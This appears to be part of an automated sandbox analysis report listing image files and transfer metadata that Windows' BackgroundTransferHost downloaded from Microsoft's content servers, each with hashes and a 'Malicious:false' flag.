                                                                                                                        Preview: ......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 21.1 (Windows).2020:08:25 09:19:56.............................8..........................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................Z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...HEc......%?.*2.L..LC .*.9..RhD....5b...$.3'F.N.FeJ#L......>.:..1....0....R..q}....-.1......T............m.... ..h(..5...... "4....x....'.."...X:...
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\4fca2ad7-819f-4ce7-871e-d7f95abce2d8.701c9b8b-e624-449d-a7f7-5920d87b9fa6.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.596377708245441
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiJTyWzgx71+XxPWJsafc+Oc2CpXpjjX+vUVi9BKkX3KPbDkwU:LLD2mRiNZgvIOJrfeIXpjjX+v8i9BKkX
                                                                                                                        MD5:0FE0FF6CA45026CD1EBF503AC1ACEBFB
                                                                                                                        SHA1:EF50B263F19557055B5532596B2D25AD258675A9
                                                                                                                        SHA-256:EBAA06E959ED054EC3F00769234D5D05D09996EF388448147655EEBA2488483F
                                                                                                                        SHA-512:4FA7BF1964C753E5E21CB8610186FDA56210CE8F83733389FC2E8133D2AE694E97BE508026437168EE5480E38EC1A293AB82B5A62D2FD22E192C2EB5F3C1E05E
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.k.k.?.v.e.r.=.8.c.6.2...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.h.u.,. .1.3. .J.a.n. .2.0.2.2. .1.7.:.1.1.:.1.0. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .4.e.0.a.9.3.4.6.-.0.9.9.0.-.4.3.c.9.-.8.3.2.3.-.2.1.8.3.5.2.0.d.5.6.b.3...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.k.k.?.v.e.r.=.8.c.6.2...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.8.2.9.9.9.4...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.8.2.9.9.9.4...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\4fca2ad7-819f-4ce7-871e-d7f95abce2d8.up_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):276
                                                                                                                        Entropy (8bit):3.40203749325483
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQi9nBo:ZxMghwLtHSM1Sb9mSMXAvO
                                                                                                                        MD5:35DBDA98AE9B6FC0283A5A4C9C4AAC23
                                                                                                                        SHA1:D3DD940A127CFAE4DBC453D02027D7DB06D17ADB
                                                                                                                        SHA-256:3284A5D8408366FE712154660CA3C5723327F1F8B1E5E2573941670F2DD403EC
                                                                                                                        SHA-512:BF0901B36FC704DCF76AE93483D6DF36919B5DB3F0F92ECD083D7A44416926906F948A1BF3B16033EE375F27B634B5B81ED52DD55B4ABDE93FC0613BB74AEE62
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.k.k.?.v.e.r.=.8.c.6.2...........
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\5c717cc5-fa43-4679-9bd0-506e2460bd23.d8889b23-4a02-470f-833a-b67283ec1ed8.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.5913432744209213
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRivWzgx71+BqCTsafc+Oc2CpXpjjX+vUViZZBz5RX3z5Wbb/TeL:LLD2mRiYgv+PTrfeIXpjjX+v8i3Bz5R9
                                                                                                                        MD5:493F4DB619E362FC37095C0C075926CF
                                                                                                                        SHA1:69543AA935B7B1B1E76D9CAA1126608C2478956C
                                                                                                                        SHA-256:712BBF489C3EE89C2414725C89293818922B75D5B6E84B4759DE66D57439FBA3
                                                                                                                        SHA-512:7C7173FEDF919C56EF02A12707F19A15C532C4AB14D215A426C2319D1DBC7ECB9435D5623DC434B527F3DA964709BF6D6411014AFD518C4472B981F1208DD47A
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.9.e.R.?.v.e.r.=.b.7.f.9...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.u.e.,. .1.1. .J.a.n. .2.0.2.2. .2.1.:.0.0.:.0.8. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .f.6.2.e.3.8.8.7.-.f.f.b.c.-.4.d.9.3.-.8.c.f.8.-.a.9.a.a.7.a.e.8.4.6.3.b...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.9.e.R.?.v.e.r.=.b.7.f.9...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.8.3.7.1.1.3...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.8.3.7.1.1.3...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\5c717cc5-fa43-4679-9bd0-506e2460bd23.up_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):276
                                                                                                                        Entropy (8bit):3.426779962179868
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQiLAoMc:ZxMghwLtHSM1Sb9mSMXAv00
                                                                                                                        MD5:CF061E37763127705F0C30EE3B8AB460
                                                                                                                        SHA1:569CE40921461B1DDBFAC8B87D2E41590275CB05
                                                                                                                        SHA-256:5E635F4078440F931BFDF334D1F2EFF8B291BCD73680FF84FE0020BC06C5A944
                                                                                                                        SHA-512:28D7B7A8CF655B78218562B8430E8461B5C1CBD072B0FBCB60E4F595B74DE7ADDB6A8F18E04EE0C0E216FA16794ED8574D1768B1360AB4EF45CC282CC761E763
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.9.e.R.?.v.e.r.=.b.7.f.9...........
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\6f37363b-c375-4b45-91f9-ec727d246644.c7c3e4c9-bbf8-40be-800f-a09c9aae178d.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1218
                                                                                                                        Entropy (8bit):3.589442580791056
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRipcTpWzgx71+8zsafc+Oc2CpXpPkX+vUViiBg5X3gebiL:LLD2mRiS6gvNzrfeIXpPkX+v8iiBg5Xq
                                                                                                                        MD5:ED6375356DBE3105FB3C6C285BB7BB61
                                                                                                                        SHA1:5B44C771F10C06AB6630EA9415D22B0ABF5072D9
                                                                                                                        SHA-256:B910022E06D2F1FEB8D961628DBA6EF12A63A492182EEBEE6C33077E6035BD0B
                                                                                                                        SHA-512:6525445A1750C62123EC52C830F22F93D79ABA02468C9A5E07ED49AE829EC4A1F1AE3B228DB239B867279134BF5C6FE3C97A3E44B2B64C3AFC62969D774D0391
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.j.Z.?.v.e.r.=.e.e.7.1...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.h.u.,. .1.3. .J.a.n. .2.0.2.2. .1.1.:.5.7.:.3.3. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .e.d.f.f.1.b.c.b.-.c.f.5.5.-.4.8.c.8.-.8.7.e.6.-.a.d.0.4.2.6.9.c.4.b.e.9...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.p.n.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.j.Z.?.v.e.r.=.e.e.7.1...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.5.5.2.0...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.5.5.2.0...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.l.i.c.,. .
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\6f37363b-c375-4b45-91f9-ec727d246644.up_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):276
                                                                                                                        Entropy (8bit):3.4307777993094337
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQi9nOxzX:ZxMghwLtHSM1Sb9mSMXAvN
                                                                                                                        MD5:4ADC4A45A014F77488BFC079F95EB4D0
                                                                                                                        SHA1:4B9467083C60E6D721E714FBC7B1940421B758CB
                                                                                                                        SHA-256:917FDDAA8EBC6C91DB178BAF7353B9BD01EA1C5DCE9DE8AA555647277C3E021F
                                                                                                                        SHA-512:5C958A1C5C610F00DD5B8543699A98E325A7E9674770975D8091BFBCE58EA59811DF813E2CD7F79E09E7738F1A3F535B4B038FE11D7B8406F80E700523FAABD9
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.j.Z.?.v.e.r.=.e.e.7.1...........
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\7e716a44-d46f-42ba-819e-1ad870190297.cc9fc646-c2fc-4fa6-88b0-56f3d96acf5a.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.5969448589373916
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiDTXWzgx71+A8tzsafc+Oc2CpXpjjX+vUViXBGX3xbHckwU:LLD2mRiHwgvL8ZrfeIXpjjX+v8iXBGXJ
                                                                                                                        MD5:E88A4678CD98FF4C33ABE52268A7C0F1
                                                                                                                        SHA1:0ACC06763288CBD46231C1359D8C515A8F9E5DBF
                                                                                                                        SHA-256:BDBA791D2D197B661BA522F55DE509508C61FB7A3ADB24C187CF9F51E56C6E86
                                                                                                                        SHA-512:5A99D466C70AC3D5F0276E05EDF359450D3625FF6951226ADB2DDE453FB3BB06FABA7F97F4F4A1DA3738225BFC82313F864C9A8D8272A4380D90D4534882ECBB
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.u.h.o.?.v.e.r.=.a.d.3.8...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.h.u.,. .1.3. .J.a.n. .2.0.2.2. .2.3.:.2.1.:.5.3. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .4.0.d.b.9.f.5.a.-.0.5.5.5.-.4.3.6.a.-.b.6.3.5.-.c.c.b.9.6.e.b.b.8.e.9.5...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.u.h.o.?.v.e.r.=.a.d.3.8...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.7.2.7.9.8.7...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.7.2.7.9.8.7...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\7e716a44-d46f-42ba-819e-1ad870190297.up_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):276
                                                                                                                        Entropy (8bit):3.4204444333325688
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQizLr/:ZxMghwLtHSM1Sb9mSMXAvOf
                                                                                                                        MD5:69EC42767BCC5CEE5A189FC425B84465
                                                                                                                        SHA1:CE4B848763A15E9379BAD715BE394DB4F381E95F
                                                                                                                        SHA-256:099126C5D7E0375F4648D823761E763941ED67B55169B9C6BFECB06ED74F1856
                                                                                                                        SHA-512:5DF588622ACB60A8B79EE729A6D818EDA9EEAC8EFB4A0ED413E2CF179F68D16E9DAFAA1DDCD1D7D3A96936E32837CAF7FBC932E61411CAB2A73AEBC753906EEF
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.u.h.o.?.v.e.r.=.a.d.3.8...........
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\8d55ce73-4b6e-4fc2-8c77-af49ec66c092.7e4aef61-82dc-4c05-85c3-81f1b0303abe.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.5787279232030773
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiwQfO1Wzgx71+f+fYMYsafc+Oc2CpXpjjX+vUViwQjBWX3BbN+zP6D:LLD2mRiHWOgvELbrfeIXpjjX+v8iHjBq
                                                                                                                        MD5:8267193EA712F064D8D137F0ED94624D
                                                                                                                        SHA1:44176BFD36C7E0E23106020D1E266C3ECDDD74DF
                                                                                                                        SHA-256:589148B40E1EFEF193CA4EB5F35D1DC591FCB22898346A7CA8655A3E70633FCB
                                                                                                                        SHA-512:7BBF2908CDEC58D9A8EE1949CBC3636F7B8C69E30EFBDF27B2D434BCEDC6F6C2E894D6B69C2E62A1D4957B776D6658D68EDE88D7979A30FC8438D71E999F91E5
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.Y.e.S.?.v.e.r.=.0.9.d.6...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .F.r.i.,. .1.4. .J.a.n. .2.0.2.2. .1.3.:.0.9.:.4.7. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .0.8.1.5.2.c.d.8.-.c.d.a.3.-.4.1.0.e.-.8.e.7.c.-.d.a.c.2.c.1.6.a.0.c.8.8...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.Y.e.S.?.v.e.r.=.0.9.d.6...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .6.4.9.4.2.8...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .6.4.9.4.2.8...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\8d55ce73-4b6e-4fc2-8c77-af49ec66c092.up_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):278
                                                                                                                        Entropy (8bit):3.3958192057775554
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRm4AUo:ZxMghwLtHSM1Sb9mSMXAvwRm4AU
                                                                                                                        MD5:8FF007CE8512BF0CB7AF77033E0AC28E
                                                                                                                        SHA1:8F5BC2546847165502F11236D056EF83E97A4305
                                                                                                                        SHA-256:EF2F70B62E80BF46BFD71A89762993EAB3006186B1CD8CB9E9255E8897CF266C
                                                                                                                        SHA-512:872FD514C0096CF6A36426C37AA1E946A20AC78CDE7FB1D4E1E45A8C2D5059617F33FAEB4FEC7DB2BEA56CEDDA8CB8DEC5687225D20262D1903BDDF15D71AE31
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.Y.e.S.?.v.e.r.=.0.9.d.6...........
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\bdc8be70-232d-44db-b8b8-fc3a9a8df62c.d8889b23-4a02-470f-833a-b67283ec1ed8.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.5913432744209213
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRivWzgx71+BqCTsafc+Oc2CpXpjjX+vUViZZBz5RX3z5Wbb/TeL:LLD2mRiYgv+PTrfeIXpjjX+v8i3Bz5R9
                                                                                                                        MD5:493F4DB619E362FC37095C0C075926CF
                                                                                                                        SHA1:69543AA935B7B1B1E76D9CAA1126608C2478956C
                                                                                                                        SHA-256:712BBF489C3EE89C2414725C89293818922B75D5B6E84B4759DE66D57439FBA3
                                                                                                                        SHA-512:7C7173FEDF919C56EF02A12707F19A15C532C4AB14D215A426C2319D1DBC7ECB9435D5623DC434B527F3DA964709BF6D6411014AFD518C4472B981F1208DD47A
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.9.e.R.?.v.e.r.=.b.7.f.9...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.u.e.,. .1.1. .J.a.n. .2.0.2.2. .2.1.:.0.0.:.0.8. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .f.6.2.e.3.8.8.7.-.f.f.b.c.-.4.d.9.3.-.8.c.f.8.-.a.9.a.a.7.a.e.8.4.6.3.b...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.9.e.R.?.v.e.r.=.b.7.f.9...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.8.3.7.1.1.3...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.8.3.7.1.1.3...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\bdc8be70-232d-44db-b8b8-fc3a9a8df62c.down_data
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 21.1 (Windows), datetime=2020:08:25 09:18:51]
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1837113
                                                                                                                        Entropy (8bit):7.102008955383616
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:ZdC81bz+Y6eH6kUZlsEyfcq/irE/R0JGSUtvBafF3VVYEMntQRiOWXL47u694s3e:ZdC81bzpH/t0V9MiRnaL+ua3xBNU
                                                                                                                        MD5:799C3428C8E6A5556DD21C00AABEF97B
                                                                                                                        SHA1:D0130AB57E5ACE2CA39E2F49F3E822D82E9BBDCC
                                                                                                                        SHA-256:9978B1B37A71F1E041B11123A1451E93A2AAB6BBCEBC7DE01BA0B8BF22C74B11
                                                                                                                        SHA-512:B7A78F6175BA2F15C72C936CA30570A7D56B2BABEB3C031C202B81E85D2D661FEEF2B665A9263CAC417BC75D73344205F28C6C859DE84BC97B3421F2DBE97E3F
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
